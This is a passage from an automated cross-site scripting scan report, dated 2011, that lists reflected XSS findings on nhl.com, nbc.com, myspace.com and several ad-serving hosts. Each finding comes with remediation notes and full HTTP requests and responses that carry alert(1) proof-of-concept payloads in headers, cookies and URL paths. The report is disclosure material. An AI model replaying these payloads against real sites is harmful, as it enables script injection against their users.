This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /geo/cm/68/Schedulec0bcd(a)8afefe14983/1 HTTP/1.1
Host: www.nhl.com
Proxy-Connection: keep-alive
Content-Length: 0
Origin: http://www.nhl.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nhl.com/ice/schedulebyweek.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=40367613.838394407.1317595837.1317595837.1317595837.1; __utmb=40367613.2.10.1317595837; __utmc=40367613; __utmz=40367613.1317595837.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __cst=b929037341ef9f36; __csv=2a31db5320bf2a6b|0; __csnv=bf8a73fc5c7cca3d; __ctl=2a31db5320bf2a6b1; __csref=; s_sq=nhlnhlleaguecom%2Cnhlglobal%3D%2526pid%253Dnhl%25253Aen%25253Ahomepage%25253Aindex%2526pidt%253D1%2526oid%253Dhttp%25253A//www.nhl.com/ice/schedulebyweek.htm%252523%25253Fnavid%25253Dnav-sch-main%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Jetty(7.0.0.v20091005)
Date: Sun, 02 Oct 2011 22:56:12 GMT
Content-Length: 69
Connection: close

<!-- no content module for Schedulec0bcd(a)8afefe14983 location 1 -->

2.251. http://adnxs.revsci.net/imp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adnxs.revsci.net
Path:   /imp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2510'-alert(1)-'c3b5e79b045 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp?Z=728x90&s=1628957&r=0&_salt=1639190193&u=http%3A%2F%2Fdelb.opt.fimserve.com%2Fadopt%2F%3Fr%3Dh%26l%3D19200011%26pos%3Dleaderboard%26rnd%3D366162222 HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.google.com/search?hl=en&q=d2510'-alert(1)-'c3b5e79b045
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 22:54:54 GMT
Content-Length: 597

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=728x90&referrer=http://www.google.com/search%3Fhl=en%26q=d2510'-alert(1)-'c3b5e79b045&inv_code=1628957&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D728x90%26s%3D1628957%26r%3D0%26_salt%3D1639190193%26u%3Dhttp%253A%252F%252Fdelb.opt.f
...[SNIP]...

2.252. http://fw.adsafeprotected.com/rjss/choices.truste.com/10736/9003/ca [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/choices.truste.com/10736/9003/ca

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d598"-alert(1)-"8cbd1ea9ede was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/choices.truste.com/10736/9003/ca?pid=hp01&aid=hp02&cid=72186705&c=cachebuster&w=160&h=600&plc=tl&js=10 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.google.com/search?hl=en&q=2d598"-alert(1)-"8cbd1ea9ede
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0F63AD242202D43D833854E83C53A58A; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:26 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.google.com/search?hl=en&q=2d598"-alert(1)-"8cbd1ea9ede",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/choices.truste.com/10736/9003/ca?pid=hp01&aid=hp02&cid=72186705&c=cachebuster&w=160&h=600&plc=tl&js=10",
   adsafeSep : "&",
   requrl : "",
   reqquery : "
...[SNIP]...

2.253. http://fw.adsafeprotected.com/rjss/dc/10736/179733/adj/N5823.8705.MLB/B5918949.10 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/dc/10736/179733/adj/N5823.8705.MLB/B5918949.10

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a853f"-alert(1)-"bbeb9762c7e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/dc/10736/179733/adj/N5823.8705.MLB/B5918949.10;sz=160x600;ord=6927014? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.google.com/search?hl=en&q=a853f"-alert(1)-"bbeb9762c7e
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1E2429F5EBFB2A940BD072BC0FC6AB6C; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:25 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.google.com/search?hl=en&q=a853f"-alert(1)-"bbeb9762c7e",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10736/179733/adj/N5823.8705.MLB/B5918949.10;sz=160x600;ord=6927014",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneH
...[SNIP]...

2.254. http://fw.adsafeprotected.com/rjss/dc/10736/179745/adj/N5823.8705.MLB/B5918949.6 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/dc/10736/179745/adj/N5823.8705.MLB/B5918949.6

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3d11"-alert(1)-"2f4ef636518 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/dc/10736/179745/adj/N5823.8705.MLB/B5918949.6;sz=160x600;ord=2586041? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.google.com/search?hl=en&q=a3d11"-alert(1)-"2f4ef636518
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=082AB5E86F802B239B6BA532292C7307

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2CF9BAB10B2F85F2FE2728A63680D53F; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:29:54 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.google.com/search?hl=en&q=a3d11"-alert(1)-"2f4ef636518",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10736/179745/adj/N5823.8705.MLB/B5918949.6;sz=160x600;ord=2586041",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHo
...[SNIP]...

2.255. http://myspace.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://myspace.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed6f4"><script>alert(1)</script>9fe1e812605 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?ed6f4"><script>alert(1)</script>9fe1e812605=1 HTTP/1.1
Host: myspace.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Content-Type: text/html
Location: http://www.myspace.com/?ed6f4"><script>alert(1)</script>9fe1e812605=1
Server: Microsoft-IIS/7.5
X-Server: 8a6c18842ebd84945a51da31b9a164261832b5043f29cef3
Date: Sun, 02 Oct 2011 22:50:00 GMT
Content-Length: 180

<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://www.myspace.com/?ed6f4"><script>alert(1)</script>9fe1e812605=1">here</a>.</h2></body></html>

2.256. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [s_vi cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://snas.nbcuni.com
Path:   /snas/api/getRemoteDomainCookies

Issue detail

The value of the s_vi cookie is copied into the HTML document as plain text between tags. The payload b4152<script>alert(1)</script>0a720ee56a was submitted in the s_vi cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1
Host: snas.nbcuni.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nbc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27331A26051D3991-6000010800171907[CE]b4152<script>alert(1)</script>0a720ee56a

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:03:18 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=10
Expires: Sun, 02 Oct 2011 23:03:28 GMT
Content-Length: 184
Content-Type: text/html

__nbcsnasadops.doSCallback({ "cookie":{"JSESSIONID":"9FF1319B1415D041CE80699F6C4F0D4C","s_vi":"[CS]v1|27331A26051D3991-6000010800171907[CE]b4152<script>alert(1)</script>0a720ee56a"}});

2.257. http://www.nbc.com/assets/esp/social/Identity/getLoginRegV3Global/.html [REST URL parameter 4]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nbc.com
Path:   /assets/esp/social/Identity/getLoginRegV3Global/.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76b68"><img%20src%3da%20onerror%3dalert(1)>6278c58b71f was submitted in the REST URL parameter 4. This input was echoed as 76b68"><img src=a onerror=alert(1)>6278c58b71f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /assets/esp/social/Identity76b68"><img%20src%3da%20onerror%3dalert(1)>6278c58b71f/getLoginRegV3Global/.html HTTP/1.1
Host: www.nbc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nbc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-true=no; AKNBC=CT-1; s_cc=true; s_nr=1317596092745; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://my.nbc.com/
Wirt: qw-p-web18.qwplatform.com
X-Cnection: close
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache, no-store
Expires: Sun, 02 Oct 2011 22:58:46 GMT
Date: Sun, 02 Oct 2011 22:58:46 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 80578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
<a href="/accounts/login?redirectUrl=/message/compose/?to=Identity76b68"><img src=a onerror=alert(1)>6278c58b71f">
...[SNIP]...

2.258. http://www.nbc.com/assets/esp/social/Identity/getLoginRegV3Global/.html [REST URL parameter 4]  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nbc.com
Path:   /assets/esp/social/Identity/getLoginRegV3Global/.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1509a'%3b7c5462401ec was submitted in the REST URL parameter 4. This input was echoed as 1509a';7c5462401ec in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /assets/esp/social/Identity1509a'%3b7c5462401ec/getLoginRegV3Global/.html HTTP/1.1
Host: www.nbc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nbc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-true=no; AKNBC=CT-1; s_cc=true; s_nr=1317596092745; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://my.nbc.com/
Wirt: qw-p-web03.qwplatform.com
X-Cnection: close
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache, no-store
Expires: Sun, 02 Oct 2011 22:58:47 GMT
Date: Sun, 02 Oct 2011 22:58:47 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 79962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
<script type="text/javascript">
       jqN.ajax({
           type: "GET",
           url: "/RewardFeed/getFeaturedItems/index.xhtml",
           data: {'userName' : 'Identity1509a';7c5462401ec'},
           success: function(msg)
           {
               jqN("#featured-rewards").html(msg);
           }
       });
   </script>
...[SNIP]...

Report generated by XSS.CX at Sun Oct 02 18:45:11 CDT 2011.